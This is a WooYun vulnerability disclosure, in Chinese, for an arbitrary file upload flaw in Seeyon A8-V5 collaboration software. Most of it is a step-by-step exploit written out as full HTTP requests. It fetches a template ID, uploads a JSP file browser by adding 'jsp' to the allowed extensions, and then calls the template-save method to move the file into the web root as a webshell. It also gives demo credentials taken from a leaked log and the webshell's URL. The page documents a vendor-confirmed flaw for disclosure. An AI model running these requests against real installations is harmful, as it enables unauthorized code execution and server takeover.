当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088260

漏洞标题:致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)

相关厂商:seeyon.com

漏洞作者: 路人甲

提交时间:2014-12-23 14:26

修复时间:2015-02-06 14:28

公开时间:2015-02-06 14:28

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2014-12-29: 细节向第三方安全合作伙伴开放
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-02-06: 细节向公众公开

简要描述:

这几天一直在琢磨致远A8-V5,昨天发现几个小问题,今天进一步挖掘到任意文件上传漏洞。

详细说明:

致远A8-V5协同管理软件允许普通用户调用本属于system·权限的功能【登陆页模板管理】,虽然不能利用浏览器直接访问该功能,提示权限不足,但是直接发送数据包即可成功。
致远A8-V5协同管理软件充分的考虑了上传文件所带来的危险,全系统都采用上传文件缓存到web目录以外,不能直接获取webshell。但利用【登陆页模板管理】处的文件缓存迁移到web目录功能即可获取webshell。

漏洞证明:

演示地址:
http://a8v51.seeyon.com/
演示账户:scyd/123456,泄露的log中获取到的。
步骤:
1.利用合法会话获取模板的ID
2.突破限制上传jsp可执行文件
3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录
证明开始:
1.利用合法会话获取模板的ID
request:

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 74
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849
managerMethod=selectTemplateById&arguments=["2676694155142778633"]


response:

{"name":"登录页-单图片式","path":"default\/login.jsp","description":"单图片式,极简风格","updateTime":"2014-12-22 00:00","sort":"1","preset":1,"updateUser":"8469117046183055270","cdefault":0,"thumbnail":"default\/thumbnail.png","id":"2676694155142778633","new":false,"extraMap":{}}


此处需要记录response中的参数id的值2676694155142778633
2.突破限制上传jsp可执行文件
需要修改原始post请求中的extensions,在“jpg,jpeg,gif,bmp,png”后添加jsp;修改filename的文件名由.jsg改为.jsp
修改后request如下:

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=true
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7ded626340460
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 76766
DNT: 1
Host: a8v51.seeyon.com
Cookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752
-----------------------------7ded626340460
Content-Disposition: form-data; name="type"
-----------------------------7ded626340460
Content-Disposition: form-data; name="extensions"
jpg,jpeg,gif,bmp,png,jsp
-----------------------------7ded626340460
Content-Disposition: form-data; name="applicationCategory"
1
-----------------------------7ded626340460
Content-Disposition: form-data; name="destDirectory"
-----------------------------7ded626340460
Content-Disposition: form-data; name="destFilename"
-----------------------------7ded626340460
Content-Disposition: form-data; name="maxSize"
2097152
-----------------------------7ded626340460
Content-Disposition: form-data; name="isEncrypt"
false
-----------------------------7ded626340460
Content-Disposition: form-data; name="callMethod"
uploadCallBack2
-----------------------------7ded626340460
Content-Disposition: form-data; name="attachmentTrId"
poi3
-----------------------------7ded626340460
Content-Disposition: form-data; name="firstSave"
true
-----------------------------7ded626340460
Content-Disposition: form-data; name="takeOver"
true
-----------------------------7ded626340460
Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"
Content-Type: text/plain
<%--
	jsp File browser 1.2
	
--%>
-----------------------------7ded626340460--


在response中查找".jsp"

00.png


记录

fileurls=fileurls+","+'-4028755744185366901';

中的值”-4028755744185366901“
3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录
先看看源代码是怎么写的

if ("1".equals(hotSpotType)) {
          String picFileId = (String)params.get("picFileId" + i);
          if ((picFileId != null) && (picFileId.trim().length() > 0)) {
            File uploadedFile = this.fileManager.getFile(Long.valueOf(Long.parseLong(picFileId)), new Date());
            try {
              String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
              FileCopyUtils.copy(uploadedFile, new File(Template_Parent_Path + targetUrl));
              this.fileSynchronization.copy(new FileInputStream(uploadedFile), "main/login/" + targetUrl);
              hotspot.setHotspotvalue(targetUrl);
            } catch (IOException e) {
              throw new BusinessException("存放图片文件出错:" + e);
            }
          }
        }


成功的关键是需要两个参数,一个是picFileId,一个是targetUrl
好了,在此次演示中
picFileId的值为步骤二里面的-4028755744185366901
targetUrl=

String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());


picFileId 已知
hotspotvalue可以自定义
被自定义的位置为最后一行,步骤一中得到的id如果不同,需要替换下面的id为步骤一中的id
request如下:

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 5255
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752
managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"登录页-单图片式","description":"å•å›¾ç‰‡å¼ï¼Œæžç®€é£Žæ ¼","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"致远A8-V5协同管理软件","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"致远A8-V5协同管理软件","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]


response响应为null即可成功,此处将存储到非web目录的缓存文件迁移到了web目录
webshell地址

http://a8v51.seeyon.com/seeyon/main/login/default/-4028755744185366901.jsp


【【【【【【注意删不掉】】】】】】
【【【【【【不是我不删】】】】】】

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-26 10:20

厂商回复:

已经复现,正在解决。

最新状态:

暂无